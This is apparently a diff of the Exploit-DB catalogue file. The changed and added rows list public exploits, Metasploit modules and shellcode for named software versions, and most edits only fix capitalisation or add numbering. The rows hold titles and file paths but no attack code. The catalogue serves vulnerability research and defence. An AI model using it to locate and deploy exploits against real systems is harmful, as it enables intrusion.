10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
40083,platforms/php/webapps/40083.txt,"WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80
10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",windows,dos,21
10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass / Arbitrary File Upload",2009-11-17,blackenedsecurity,asp,webapps,0
@ -9495,7 +9495,7 @@ id,file,description,date,author,platform,type,port
10177,platforms/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0
10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component com_ezine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0
10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0
10181,platforms/php/webapps/10181.txt,"bitrix site manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0
10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0
10182,platforms/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,hardware,dos,0
10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 RCE via TinyMCE - Arbitrary File Upload",2009-11-19,daath,php,webapps,80
10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0
@ -10323,7 +10323,7 @@ id,file,description,date,author,platform,type,port
11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0
11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0
11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
11249,platforms/php/webapps/11249.txt,"boastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0
11249,platforms/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0
11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0
@ -11141,7 +11141,7 @@ id,file,description,date,author,platform,type,port
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles - (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
12191,platforms/php/webapps/12191.txt,"Joomla! Component com_jp_jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0
12192,platforms/php/webapps/12192.txt,"blog system 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0
12192,platforms/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0
12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0
12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0
12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injections",2010-04-13,"Easy Laster",php,webapps,0
@ -11375,7 +11375,7 @@ id,file,description,date,author,platform,type,port
12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - (Windows x86) CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0
12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL Injection / Cross-Site Scripting) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0
12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0
12460,platforms/php/webapps/12460.txt,"b2b gold script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0
12460,platforms/php/webapps/12460.txt,"B2B Gold Script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0
12461,platforms/php/webapps/12461.txt,"JobPost - SQL Injection",2010-04-30,Sid3^effects,php,webapps,0
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQL Injection",2010-04-30,Sid3^effects,php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
@ -11589,7 +11589,7 @@ id,file,description,date,author,platform,type,port
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0
12692,platforms/php/webapps/12692.txt,"Wordpress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0
12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0
12694,platforms/php/webapps/12694.txt,"Tochin eCommerce - Multiple Remote Exploits",2010-05-22,cyberlog,php,webapps,0
12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0
@ -11680,7 +11680,7 @@ id,file,description,date,author,platform,type,port
12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0
12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0
12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0
12804,platforms/multiple/remote/12804.txt,"Nginx http server 0.6.36 - Directory Traversal",2010-05-30,"cp77fk4r ",multiple,remote,0
12804,platforms/multiple/remote/12804.txt,"Nginx 0.6.36 - Directory Traversal",2010-05-30,"cp77fk4r ",multiple,remote,0
12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
12806,platforms/php/webapps/12806.txt,"CMScout - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0
@ -12959,7 +12959,7 @@ id,file,description,date,author,platform,type,port
14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0
14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0
14801,platforms/php/webapps/14801.txt,"atomic photo album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0
14801,platforms/php/webapps/14801.txt,"Atomic Photo Album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0
14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0
14811,platforms/php/webapps/14811.txt,"Joomla! Component com_remository - Arbitrary File Upload",2010-08-26,J3yk0ob,php,webapps,0
14808,platforms/php/webapps/14808.pl,"Mini-CMS / News Script Light 1.0 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0
@ -13140,7 +13140,7 @@ id,file,description,date,author,platform,type,port
15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0
15070,platforms/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps,0
15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - (SoftekATL.dll) Buffer Overflow (PoC)",2010-09-21,LiquidWorm,windows,remote,0
15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0
15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)",2010-09-21,Trancer,windows,remote,0
15073,platforms/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0
15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Privilege Escalation",2010-09-21,fuzz,linux,local,0
15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,php,webapps,0
@ -13338,7 +13338,7 @@ id,file,description,date,author,platform,type,port
15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0
15319,platforms/windows/dos/15319.pl,"Apache 2.2 - (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0
15320,platforms/php/webapps/15320.py,"BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0
15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and SearchString) - SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15323,platforms/php/webapps/15323.txt,"DZCP (deV!L_z Clanportal) 1.5.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps,0
@ -14044,7 +14044,7 @@ id,file,description,date,author,platform,type,port
16218,platforms/php/webapps/16218.txt,"WordPress Plugin Z-Vote 1.1 - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps,0
16213,platforms/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16214,platforms/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0
16217,platforms/php/webapps/16217.txt,"Bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
@ -14081,7 +14081,7 @@ id,file,description,date,author,platform,type,port
16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0
16265,platforms/php/webapps/16265.txt,"Readmore Systems Script - SQL Injection",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0
16266,platforms/php/webapps/16266.txt,"Quicktech - SQL Injection",2011-03-02,eXeSoul,php,webapps,0
16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
16267,platforms/php/webapps/16267.txt,"Bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0
16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0
@ -14097,7 +14097,7 @@ id,file,description,date,author,platform,type,port
16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0
16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0
16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0
16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2010-11-11,Metasploit,multiple,remote,0
16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2)",2010-11-11,Metasploit,multiple,remote,0
16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote,0
16290,platforms/multiple/remote/16290.rb,"Veritas NetBackup - Remote Command Execution (Metasploit) (2)",2010-10-09,Metasploit,multiple,remote,0
16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0
@ -14195,7 +14195,7 @@ id,file,description,date,author,platform,type,port
16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0
16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
@ -14310,7 +14310,7 @@ id,file,description,date,author,platform,type,port
16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16500,platforms/windows/remote/16500.rb,"Hyleos ChemView - ActiveX Control Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0
16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)",2010-09-21,Metasploit,windows,remote,0
16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)",2010-09-21,Metasploit,windows,remote,0
16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (1)",2010-04-30,Metasploit,windows,local,0
16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (1)",2010-05-03,Metasploit,windows,local,0
@ -14373,7 +14373,7 @@ id,file,description,date,author,platform,type,port
16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0
16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer - vcst_eu.dll ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0
16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll 4.9 - ActiveX Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0
16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0
@ -14725,7 +14725,7 @@ id,file,description,date,author,platform,type,port
16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,linux,remote,0
16917,platforms/php/webapps/16917.rb,"Dogfood CRM - spell.php Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0
16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection (Metasploit)",2010-07-03,Metasploit,freebsd,remote,0
16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution (Metasploit) (2)",2010-07-03,Metasploit,linux,remote,0
16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,linux,remote,0
16921,platforms/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,linux,remote,0
16922,platforms/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)",2010-12-05,Metasploit,linux,remote,0
@ -14868,7 +14868,7 @@ id,file,description,date,author,platform,type,port
17077,platforms/php/webapps/17077.txt,"Pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0
17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution (ZDI-11-113)",2011-03-30,ikki,multiple,remote,0
17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0
17080,platforms/php/webapps/17080.txt,"Bigace 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0
17080,platforms/php/webapps/17080.txt,"BigACE 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0
17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0
17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0
17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0
@ -15321,7 +15321,7 @@ id,file,description,date,author,platform,type,port
17628,platforms/php/webapps/17628.txt,"WordPress Plugin Media Library Categories 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0
17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0
17630,platforms/php/webapps/17630.txt,"AChecker 1.2 - Multiple Error-Based SQL Injection Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0
17631,platforms/php/webapps/17631.txt,"atutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0
17631,platforms/php/webapps/17631.txt,"ATutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0
17633,platforms/php/webapps/17633.txt,"Cart Software - Multiple Vulnerabilities",2011-08-06,hosinn,php,webapps,0
17634,platforms/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass",2011-08-07,"C4SS!0 G0M3S",windows,local,0
17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL - Interface Universal Directory Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0
@ -16175,7 +16175,7 @@ id,file,description,date,author,platform,type,port
18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit)",2012-03-24,Metasploit,php,webapps,0
18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0
18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 - file handling memory Corruption",2012-03-24,"Senator of Pirates",windows,dos,0
18676,platforms/php/webapps/18676.txt,"boastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps,0
18676,platforms/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps,0
18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - SQL Injection",2012-03-28,ZeTH,php,webapps,0
18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - (vncviewer.exe) Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0
18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server - Denial of Service (PoC)",2012-03-25,ls,multiple,dos,0
@ -17027,6 +17027,7 @@ id,file,description,date,author,platform,type,port
19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid dialer",1999-12-01,"Brock Tellier",freebsd,local,0
19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin'",1998-12-02,"Brock Tellier",sco,local,0
19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0
19656,platforms/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Buffer Overflow",1999-12-03,"Brock Tellier",sco,local,0
@ -17363,7 +17364,7 @@ id,file,description,date,author,platform,type,port
20006,platforms/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (2)",2000-06-08,"Renaud Deraison",windows,dos,0
20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 - userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0
20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0
20009,platforms/linux/remote/20009.py,"atmail email server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,linux,remote,0
20009,platforms/linux/remote/20009.py,"AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,linux,remote,0
20011,platforms/windows/webapps/20011.js,"SolarWinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0
20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption",2000-06-07,Phate.net,windows,local,0
20013,platforms/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 - Buffer Overflow",2000-06-01,Syzop,linux,local,0
@ -17641,6 +17642,7 @@ id,file,description,date,author,platform,type,port
20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure",2000-10-11,"Dirk Brockhausen",cgi,remote,0
20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0
20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,windows,remote,0
40428,platforms/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,windows,local,0
20306,platforms/windows/remote/20306.html,"Microsoft Virtual Machine - Arbitrary Java Codebase Execution",2000-10-18,"Georgi Guninski",windows,remote,0
20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0
20308,platforms/linux/remote/20308.c,"Samba 1.9.19 - Long Password Buffer Overflow",1997-09-25,root@adm.kix-azz.org,linux,remote,0
@ -17683,7 +17685,7 @@ id,file,description,date,author,platform,type,port
20345,platforms/php/webapps/20345.txt,"iauto mobile Application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0
20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP - Persistent Cross-Site Scripting",2012-08-08,Vulnerability-Lab,php,webapps,0
20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injection",2012-08-08,"Lorenzo Cantoni",php,webapps,0
20348,platforms/windows/webapps/20348.py,"axigen mail server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20348,platforms/windows/webapps/20348.py,"Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20349,platforms/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20350,platforms/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20351,platforms/windows/webapps/20351.py,"mailenable enterprise 6.5 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
@ -17732,6 +17734,7 @@ id,file,description,date,author,platform,type,port
20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez and dumped",unix,remote,0
20396,platforms/hp-ux/local/20396.sh,"HP-UX 10.x/11.x - Aserver PATH",1998-10-18,Loneguard,hp-ux,local,0
20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Full Path Disclosure",2000-11-10,sozni,cgi,remote,0
40427,platforms/windows/local/40427.txt,"Iperius Remote 1.7.0 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0
20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion",2012-08-10,GoLd_M,php,webapps,0
